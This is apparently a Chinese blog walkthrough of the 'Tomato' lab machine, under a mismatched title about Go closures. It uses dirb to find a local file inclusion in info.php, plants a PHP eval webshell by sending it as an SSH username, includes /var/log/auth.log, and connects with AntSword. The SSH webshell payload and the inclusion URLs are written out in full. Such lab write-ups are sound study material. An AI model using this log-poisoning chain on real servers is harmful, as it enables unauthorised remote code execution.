0
点赞
收藏
分享

微信扫一扫

golang闭包中变量获取

蓝哆啦呀 2024-09-07 阅读 18
安全

步骤一,我们来到tomato页面

什么也弄不了只有一番茄图片

弱口令不行,xxs也不行,xxe还是不行

我们来使用kali来操作...

步骤二,使用dirb再扫一下, dirb http://172.16.1.133

1.发现这个文件可以访问.我们来访问一下

/antibot_image/

2.我们来看看他文件里面有什么东西是我们可以利用的!

3.找到网站绝对路径 info.php我们来点击进去

4.查看页面源代码 可以发现image的文件包含.

5.在info.php后面输入?image=/etc/passwd显示成功,说明存在文件包含漏洞

最下边

步骤三,将一句话木马作为ssh登录的用户名登录

1.输入

ssh '<?php phpinfo();eval($_POST["cmd"]);?>'@172.16.1.113 -p 2211

将一句话木马作为ssh登录的用户名,然后登陆,密码随便输入,这样日志文件就会记录该用户登录失败的日志,而该用户的用户名就是我们的一句话木马。

2.页面通过image传参查看日志文件

/var/log/auth.log

这个很阁僚...一开始有中间有下边还有,不过我问了一下说有就行了

发现多了一些报错信息,大概率写入木马成功.

步骤四,直接使用蚁剑进行连接:

http://172.16.1.113/antibot_image/antibots/info.php?image=/var/log/auth.log

密码:cmd

连接成功

举报

相关推荐

0 条评论